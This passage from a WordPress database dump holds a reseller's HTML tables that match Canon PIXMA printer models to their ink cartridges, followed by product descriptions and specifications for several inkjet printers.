(Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:36:10','2019-09-24 08:36:10','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3311,1,'2019-09-24 16:47:55','2019-09-24 08:47:55','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" 